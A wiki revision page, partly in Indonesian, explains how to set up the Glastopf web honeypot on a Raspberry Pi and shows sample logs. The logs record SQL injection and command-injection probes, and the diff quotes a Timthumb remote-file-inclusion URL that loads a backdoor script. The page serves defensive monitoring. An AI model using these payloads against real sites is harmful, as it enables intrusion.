Difference between revisions of "Raspbian: GlastopfPi sebuah Web Honeypot"

From OnnoWiki
Jump to navigation Jump to search
 
(15 intermediate revisions by the same user not shown)
Line 1: Line 1:
Glastopf Pi: A Simple Yet Cool Web Honeypot for your Raspberry Pi
+
Glastopf adalah sebuah aplikasi web honeypot project di pimpin oleh Lukas Rist a.k.a glaslos dari Honeynet Project. Glastopf project di mulai tahun 2009. It is a simple and minimalistic web server written in Python that records information of web-based application attacks like Structured Query Language Injection (SQLI), Remote Code Execution (RCE), Local File Inclusion (LFI), Remote File Inclusion (RFI), and many more, because it emulates web application vulnerabilities tricking attackers or scanners that it is a vulnerable web server.
34
 
inShare
 
 
 
 
 
Now let’s have another cool setup for your Raspberry Pi! If you are a follower of my recent articles, you will notice that I am really into consoles, handy devices, and Raspberry Pi; in fact, I have written an article about a list of penetration testing distribution and installer kits for Raspberry Pi. This time, I would like to introduce to you guys my new setup – Glastopf Pi!
 
 
 
Raspberry Pi enthusiasts and geeks usually name their setups or projects something that best describes what their Raspberry Pi runs most or what the project is all about. Some known projects are the Super Nintendo Pi, an emulation system that focuses on emulating SNES (Super Nintendo Entertainment System), games for Raspberry Pi that are powered by the RetroPie project, the enclosure is a SNES console including the game controllers, Mongo Pi (Mongo DB and Raspberry Pi = MongoPi), Kippo Pi – a Raspberry Pi that has a Kippo Honeypot running, RetroPie, an arcade project or emulation project for the Raspberry Pi to transform it into a Retro gaming console, etc. In my case, I named my Raspberry Pi setup to Glastopf Pi because I installed and configured it with Glastopf.
 
 
 
Glastopf is a web application honeypot project lead by Lukas Rist a.k.a glaslos of the Honeynet Project. The Glastopf project started in the year 2009. It is a simple and minimalistic web server written in Python that records information of web-based application attacks like Structured Query Language Injection (SQLI), Remote Code Execution (RCE), Local File Inclusion (LFI), Remote File Inclusion (RFI), and many more, because it emulates web application vulnerabilities tricking attackers or scanners that it is a vulnerable web server.
 
  
 
Here are some snippets of the README file for this project in order to understand this web application honeypot better:
 
Here are some snippets of the README file for this project in order to understand this web application honeypot better:
  
The adversaries usually use search engines and special crafted search requests to find their victims. In order to attract them, Glastopf provide those keywords (aka dork) and extracts them also from request and extends its attack surface automatically. So over time and with a growing number of attacks, the honeypot gets more and more attractive. In the feature we will make the SQL injection emulator pubic, provide IP profiling for crawler recognition and intelligent dork selection.
+
The adversaries usually use search engines and special crafted search requests to find their victims. In order to attract them, Glastopf provide those keywords (aka [[Dork]]) and extracts them also from request and extends its attack surface automatically. So over time and with a growing number of attacks, the honeypot gets more and more attractive. In the feature we will make the SQL injection emulator pubic, provide IP profiling for crawler recognition and intelligent [[Dork]] selection.
  
 
Glastopf has also hpfeeds, which is a central logger of the project that reports the events, but it can actually be turned off under the glastopf.cfg configuration file.
 
Glastopf has also hpfeeds, which is a central logger of the project that reports the events, but it can actually be turned off under the glastopf.cfg configuration file.
 
Now let’s begin with the setup!
 
  
 
==Prerequisites==
 
==Prerequisites==
Line 38: Line 26:
 
==Install Dependency==
 
==Install Dependency==
  
1. Tambahkan backports repository ke file sources list di directory /etc/apt
+
Tambahkan backports repository ke file sources list di directory /etc/apt
  
 
  vi /etc/apt/sources.list
 
  vi /etc/apt/sources.list
Line 44: Line 32:
 
  deb http://backports.debian.org/debian-backports squeeze-backports main
 
  deb http://backports.debian.org/debian-backports squeeze-backports main
  
2. Install
+
Update keyring
 +
 
 +
gpg --keyserver pgpkeys.mit.edu --recv-key  8B48AD6246925553     
 +
gpg -a --export 8B48AD6246925553 | sudo apt-key add -
 +
 
 +
Install dependency
  
 
  sudo apt-get update
 
  sudo apt-get update
Line 52: Line 45:
 
  python-pip python-dev python-numpy python-setuptools python-numpy-dev \
 
  python-pip python-dev python-numpy python-setuptools python-numpy-dev \
 
  python-scipy libatlas-dev g++ git php5 php5-dev liblapack-dev gfortran \
 
  python-scipy libatlas-dev g++ git php5 php5-dev liblapack-dev gfortran \
  libxml2-dev libxslt-dev
+
  libxml2-dev libxslt-dev python-mysql*
  sudo pip install –upgrade distribute
+
  sudo pip install --upgrade distribute
 +
sudo pip install --upgrade greenlet
  
==Install and configure the PHP sandbox==
+
==Install & konfigurasi PHP sandbox==
  
The next thing that we should do is to configure the PHP sandbox.
+
Konfigurasi PHP sandbox.
  
1. First, we download BFR (Better Function Replacer) by using git:
+
Pertama-tama, download BFR (Better Function Replacer) menggunakan git:
  
 
  sudo apt-get install git-core
 
  sudo apt-get install git-core
 
  cd /opt
 
  cd /opt
  sudo git clone git://github.com/glastopf/BFR.git
+
  git clone git://github.com/glastopf/BFR.git
 
  cd BFR
 
  cd BFR
  sudo phpize
+
  phpize
  sudo ./configure –enable-bfr
+
  ./configure --enable-bfr
  sudo make && make install
+
  make && make install
  
It should have this following message after the make install:
+
Di akhir proses akan keluar kata-kata
  
 
  Build complete.
 
  Build complete.
  Don’t forget to run ‘make test’.
+
  Don't forget to run 'make test'.
  Installing shared extensions: /usr/lib/php5/20100525+lfs/
+
  Installing shared extensions:     /usr/lib/php5/20100525+lfs/
  
2. Copy or append the search path to bfr.so and add it to php.ini file:
+
Lanjutkan
  
sudo echo “zend_extension = /usr/lib/php5/20100525+lfs/bfr.so” >> /etc/php5/cli/php.ini
+
make test
  
3. You should see the extension on the output by using the php –version command in the terminal:
+
Tambahkan bfr.so ke php.ini
  
  jjt@pilipinas:~# php –version
+
  vi /etc/php5/cli/php.ini
PHP 5.4.4-14 (cli) (built: Mar 4 2013 19:41:30)
 
Copyright (c) 1997-2012 The PHP Group
 
Zend Engine v2.4.0, Copyright (c) 1998-2012 Zend Technologies
 
with Better Function Replacer (BFR) v0.1, by Lukas Rist
 
  
4. Install the latest stable release of Glastopf from pip:
+
zend_extension = /usr/lib/php5/20100525+lfs/bfr.so
 +
 
 +
Cek menggunakan perintah
 +
 
 +
php --version
 +
 
 +
Hasilnya
 +
 
 +
PHP 5.4.36-0+deb7u3 (cli) (built: Jan 13 2015 01:07:43)
 +
Copyright (c) 1997-2014 The PHP Group
 +
Zend Engine v2.4.0, Copyright (c) 1998-2014 Zend Technologies
 +
    with Better Function Replacer (BFR) v0.1, , by Lukas Rist
 +
 
 +
Install Glastopf
  
 
  sudo pip install glastopf
 
  sudo pip install glastopf
  
 +
Proses ini akan lama karena harus mendownload berbagai file source code dan mengcompile-nya.
  
Configuration and Preparation for the Glastopf environment
+
==Konfigurasi dan Siapkan Environment untuk Glastopf==
  
1. Prepare the environment:
+
Siapkan folder
  
  cd /opt
+
  mkdir -p /opt/glastopfi
sudo mkdir glastopfi
 
  
2. Stop the apache service so that the web application honeypot could listen to port 80:
+
Matikan apache2 karena honeypot akan mendengarkan port 80
  
 
  sudo service apache2 stop
 
  sudo service apache2 stop
  
3. Now, run the web application honeypot:
+
Jalankan honeypot
  
 +
cd /opt/
 
  sudo glastopf-runner
 
  sudo glastopf-runner
  
4. A new default glastopf.cfg will be created in the glastopfpi directory, which can be customized to your liking just like what port you want the application to listen on. (In my case, I choose port 80 and that’s why I stopped the Apache service).
+
Akan keluar
  
5. You should see the following output from your terminal as shown by my screenshot below.
+
2015-01-16 19:14:10,227 (glastopf.glastopf) Initializing Glastopf 3.1.2 using "/opt" as work directory.
 +
2015-01-16 19:14:10,265 (glastopf.glastopf) Connecting to main database with: sqlite:///db/glastopf.db
 +
2015-01-16 19:14:10,898 (glastopf.modules.handlers.emulators.dork_list.dork_page_generator) Bootstrapping dork database.
 +
2015-01-16 19:14:11,065 (requests.packages.urllib3.connectionpool) Starting new HTTPS connection (1): mnemosyne.honeycloud.net
 +
/usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:734: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html
 +
  InsecureRequestWarning)
 +
/usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:734: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html
 +
  InsecureRequestWarning)
 +
2015-01-16 19:14:18,276 (glastopf.modules.handlers.emulators.dork_list.mnem_service) Error while requesting dorks from mnemosyne: 500
 +
2015-01-16 19:15:52,902 (glastopf.glastopf) Generating initial dork pages - this can take a while.
 +
2015-01-16 19:16:06,170 (pyhpfeeds) connecting to hpfriends.honeycloud.net:20000
 +
2015-01-16 19:16:12,664 (glastopf.glastopf) Glastopf started and privileges dropped.
  
  
Sample Screenshot of the Web Server Running
 
  
 +
 +
File glastopf.cfg akan dibuat di folder /opt/glastopfi .
 +
Kita dapat customisasi sesuai dengan yang kita inginkan,
 +
minimal kita dapat mengubah agar port yang digunakan bukan 80 jika
 +
kita ingin menggunakan port lain.
 +
 +
Contoh tampilan web glastopf
 +
 +
[[Image:Glastopf.png|center|200px|thumb|Contoh Screen Shot Tampilan Web Glastopf]]
  
 
==Logging==
 
==Logging==
  
The log files can be found under the log directory. Here is what’s inside my glastopf.log file:
+
File glastopf.log ada dalam log directory.  
 +
 
 +
/opt/log
 +
 
 +
Contoh isi file glastopf.log:
 
 
 
  2013-05-24 16:05:52,655 (glastopf.glastopf) Initializing Glastopf using "/opt/glastopfpi" as work directory.
 
  2013-05-24 16:05:52,655 (glastopf.glastopf) Initializing Glastopf using "/opt/glastopfpi" as work directory.
Line 153: Line 180:
 
  2013-05-25 11:07:45,291 (glastopf.glastopf) Stopping Glastopf.
 
  2013-05-25 11:07:45,291 (glastopf.glastopf) Stopping Glastopf.
  
==Conclusion==
+
==Penutup==
  
So what can we learn or get from setting up this kind of web application honeypot? Here are some scenarios and examples:
+
Jadi apa yang dapat kita pelajari dari sebuah aplikasi web honeypot?
 +
Berikut adalah beberapa skenario dan contoh:
  
 
* Discover malicious sources, links, or scripts just like the URLs used in Timthumb Remote Code Execution attacks: http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.iamahacker.com/backdoor.php
 
* Discover malicious sources, links, or scripts just like the URLs used in Timthumb Remote Code Execution attacks: http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.iamahacker.com/backdoor.php
Line 162: Line 190:
 
* Live capture of SQL injection techniques in a POST request used by attackers.
 
* Live capture of SQL injection techniques in a POST request used by attackers.
 
* Discover unknown or new attacks.
 
* Discover unknown or new attacks.
 
 
  
 
==Referensi==
 
==Referensi==

Latest revision as of 11:13, 29 September 2024

Glastopf adalah sebuah aplikasi web honeypot project di pimpin oleh Lukas Rist a.k.a glaslos dari Honeynet Project. Glastopf project di mulai tahun 2009. It is a simple and minimalistic web server written in Python that records information of web-based application attacks like Structured Query Language Injection (SQLI), Remote Code Execution (RCE), Local File Inclusion (LFI), Remote File Inclusion (RFI), and many more, because it emulates web application vulnerabilities tricking attackers or scanners that it is a vulnerable web server.

Here are some snippets of the README file for this project in order to understand this web application honeypot better:

The adversaries usually use search engines and special crafted search requests to find their victims. In order to attract them, Glastopf provide those keywords (aka Dork) and extracts them also from request and extends its attack surface automatically. So over time and with a growing number of attacks, the honeypot gets more and more attractive. In the feature we will make the SQL injection emulator pubic, provide IP profiling for crawler recognition and intelligent Dork selection.

Glastopf has also hpfeeds, which is a central logger of the project that reports the events, but it can actually be turned off under the glastopf.cfg configuration file.

Prerequisites

  • A raspberry pi board (I tested this setup using the B Model).
  • The Soft-float Debian “wheezy” Linux, which can be downloaded here free: http://www.raspberrypi.org/downloads
  • A Micro SD card of at least 4GB in size
  • An Internet Access

Setting up the image

  • Extract the image file from the downloaded .zip file and you should have a name-of-thedistribution.img file after.
  • Insert the Micro SD card into your reader to your computer.
  • Download Win32DiskImager and then install it.
  • Run the .exe file as an Administrator and select the image file.
  • Select the drive letter of the Micro SD card in the device box, select the image of the distribution, and then click Write.
  • Wait for it until the utility finishes writing the image of the distribution to your Micro SD card.
  • Now, boot your Raspberry Pi with your Micro SD Card.

Install Dependency

Tambahkan backports repository ke file sources list di directory /etc/apt

vi /etc/apt/sources.list
deb http://backports.debian.org/debian-backports squeeze-backports main

Update keyring

gpg --keyserver pgpkeys.mit.edu --recv-key  8B48AD6246925553      
gpg -a --export 8B48AD6246925553 | sudo apt-key add -

Install dependency

sudo apt-get update
sudo apt-get install python python-openssl python-gevent libevent-dev \
python-dev build-essential make python-argparse python-chardet \
python-requests python-sqlalchemy python-lxml python-beautifulsoup \
python-pip python-dev python-numpy python-setuptools python-numpy-dev \
python-scipy libatlas-dev g++ git php5 php5-dev liblapack-dev gfortran \
libxml2-dev libxslt-dev python-mysql*
sudo pip install --upgrade distribute
sudo pip install --upgrade greenlet

Install & konfigurasi PHP sandbox

Konfigurasi PHP sandbox.

Pertama-tama, download BFR (Better Function Replacer) menggunakan git:

sudo apt-get install git-core
cd /opt
git clone git://github.com/glastopf/BFR.git
cd BFR
phpize
./configure --enable-bfr
make &&  make install

Di akhir proses akan keluar kata-kata

Build complete.
Don't forget to run 'make test'.
Installing shared extensions:     /usr/lib/php5/20100525+lfs/

Lanjutkan

make test

Tambahkan bfr.so ke php.ini

vi /etc/php5/cli/php.ini
zend_extension = /usr/lib/php5/20100525+lfs/bfr.so

Cek menggunakan perintah

php --version

Hasilnya

PHP 5.4.36-0+deb7u3 (cli) (built: Jan 13 2015 01:07:43) 
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.4.0, Copyright (c) 1998-2014 Zend Technologies
    with Better Function Replacer (BFR) v0.1, , by Lukas Rist

Install Glastopf

sudo pip install glastopf

Proses ini akan lama karena harus mendownload berbagai file source code dan mengcompile-nya.

Konfigurasi dan Siapkan Environment untuk Glastopf

Siapkan folder

mkdir -p /opt/glastopfi

Matikan apache2 karena honeypot akan mendengarkan port 80

sudo service apache2 stop

Jalankan honeypot

cd /opt/
sudo glastopf-runner

Akan keluar

2015-01-16 19:14:10,227 (glastopf.glastopf) Initializing Glastopf 3.1.2 using "/opt" as work directory.
2015-01-16 19:14:10,265 (glastopf.glastopf) Connecting to main database with: sqlite:///db/glastopf.db
2015-01-16 19:14:10,898 (glastopf.modules.handlers.emulators.dork_list.dork_page_generator) Bootstrapping dork database.
2015-01-16 19:14:11,065 (requests.packages.urllib3.connectionpool) Starting new HTTPS connection (1): mnemosyne.honeycloud.net
/usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:734: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html
 InsecureRequestWarning)
/usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:734: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.org/en/latest/security.html
 InsecureRequestWarning)
2015-01-16 19:14:18,276 (glastopf.modules.handlers.emulators.dork_list.mnem_service) Error while requesting dorks from mnemosyne: 500
2015-01-16 19:15:52,902 (glastopf.glastopf) Generating initial dork pages - this can take a while.
2015-01-16 19:16:06,170 (pyhpfeeds) connecting to hpfriends.honeycloud.net:20000
2015-01-16 19:16:12,664 (glastopf.glastopf) Glastopf started and privileges dropped.



File glastopf.cfg akan dibuat di folder /opt/glastopfi . Kita dapat customisasi sesuai dengan yang kita inginkan, minimal kita dapat mengubah agar port yang digunakan bukan 80 jika kita ingin menggunakan port lain.

Contoh tampilan web glastopf

Contoh Screen Shot Tampilan Web Glastopf

Logging

File glastopf.log ada dalam log directory.

/opt/log

Contoh isi file glastopf.log:

2013-05-24 16:05:52,655 (glastopf.glastopf) Initializing Glastopf using "/opt/glastopfpi" as work directory.
2013-05-24 16:05:52,699 (glastopf.glastopf) Connecting to main database with: sqlite:///db/glastopf.db
2013-05-24 16:05:53,388 (glastopf.modules.handlers.emulators.dork_list.dork_page_generator) Bootstrapping dork database.
2013-05-24 16:05:53,550 (requests.packages.urllib3.connectionpool) Starting new HTTPS connection (1): mnemosyne.honeycloud.net
2013-05-24 16:05:57,169 (requests.packages.urllib3.connectionpool) "POST /login HTTP/1.1" 200 30
2013-05-24 16:05:57,991 (requests.packages.urllib3.connectionpool) "GET /api/v1/aux/dorks?limit=1000 HTTP/1.1" 200 177444
2013-05-24 16:05:59,052 (glastopf.modules.handlers.emulators.dork_list.mnem_service) Successfully retrieved 1000 dorks from the mnemosyne service.
2013-05-24 16:06:58,813 (glastopf.glastopf) Generating initial dork pages - this can take a while.
2013-05-24 16:07:53,103 (glastopf.modules.reporting.auxiliary.log_hpfeeds) Connecting to feed broker.
2013-05-24 16:07:54,613 (glastopf.modules.reporting.auxiliary.log_hpfeeds) Connected to hpfeed broker.
2013-05-24 16:07:58,171 (glastopf.glastopf) Glastopf started and privileges dropped.
2013-05-24 16:08:41,997 (glastopf.glastopf) 192.168.11.2 requested GET / on 192.168.11.32
2013-05-24 16:08:43,039 (glastopf.glastopf) 192.168.11.2 requested GET /style.css on 192.168.11.32
2013-05-24 16:08:43,442 (glastopf.glastopf) 192.168.11.2 requested GET /favicon.ico on 192.168.11.32
2013-05-24 16:09:25,179 (glastopf.glastopf) 192.168.11.2 requested GET /?id=-1%20union%20select%201,2,3,4,5,6 on 192.168.11.32
2013-05-24 16:09:27,552 (glastopf.glastopf) 192.168.11.2 requested GET /favicon.ico on 192.168.11.32
2013-05-24 16:09:39,039 (glastopf.glastopf) 192.168.11.2 requested GET /?id=1%20union%20select%201,2,3,4,5,6 on 192.168.11.32
2013-05-24 16:09:40,069 (glastopf.glastopf) 192.168.11.2 requested GET /favicon.ico on 192.168.11.32
2013-05-24 16:09:47,584 (glastopf.glastopf) 192.168.11.2 requested GET /?id=1 on 192.168.11.32
2013-05-24 16:09:47,815 (glastopf.glastopf) 192.168.11.2 requested GET /style.css on 192.168.11.32
2013-05-24 16:09:48,035 (glastopf.glastopf) 192.168.11.2 requested GET /favicon.ico on 192.168.11.32
2013-05-24 16:09:50,670 (glastopf.glastopf) 192.168.11.2 requested GET /?id=1' on 192.168.11.32
2013-05-24 16:09:50,858 (glastopf.glastopf) 192.168.11.2 requested GET /style.css on 192.168.11.32
2013-05-24 16:09:51,066 (glastopf.glastopf) 192.168.11.2 requested GET /favicon.ico on 192.168.11.32
2013-05-24 16:10:06,802 (glastopf.glastopf) 192.168.11.2 requested GET /?id=1%20union%20select%201,2,3,4,5 on 192.168.11.32
2013-05-24 16:10:07,861 (glastopf.glastopf) 192.168.11.2 requested GET /favicon.ico on 192.168.11.32
2013-05-25 11:06:56,292 (glastopf.glastopf) 192.168.11.2 requested GET /?id=ls%20-la on 192.168.11.32
2013-05-25 11:06:56,470 (glastopf.glastopf) 192.168.11.2 requested GET /style.css on 192.168.11.32
2013-05-25 11:06:56,658 (glastopf.glastopf) 192.168.11.2 requested GET /favicon.ico on 192.168.11.32
2013-05-25 11:07:17,214 (glastopf.glastopf) 192.168.11.2 requested GET /?id=http://map.honeycloud.net/ on 192.168.11.32
2013-05-25 11:07:19,537 (glastopf.sandbox.sandbox) File successfully parsed with sandbox.
2013-05-25 11:07:19,619 (glastopf.glastopf) 192.168.11.2 requested GET /favicon.ico on 192.168.11.32
2013-05-25 11:07:45,291 (glastopf.glastopf) Stopping Glastopf.

Penutup

Jadi apa yang dapat kita pelajari dari sebuah aplikasi web honeypot? Berikut adalah beberapa skenario dan contoh:

Referensi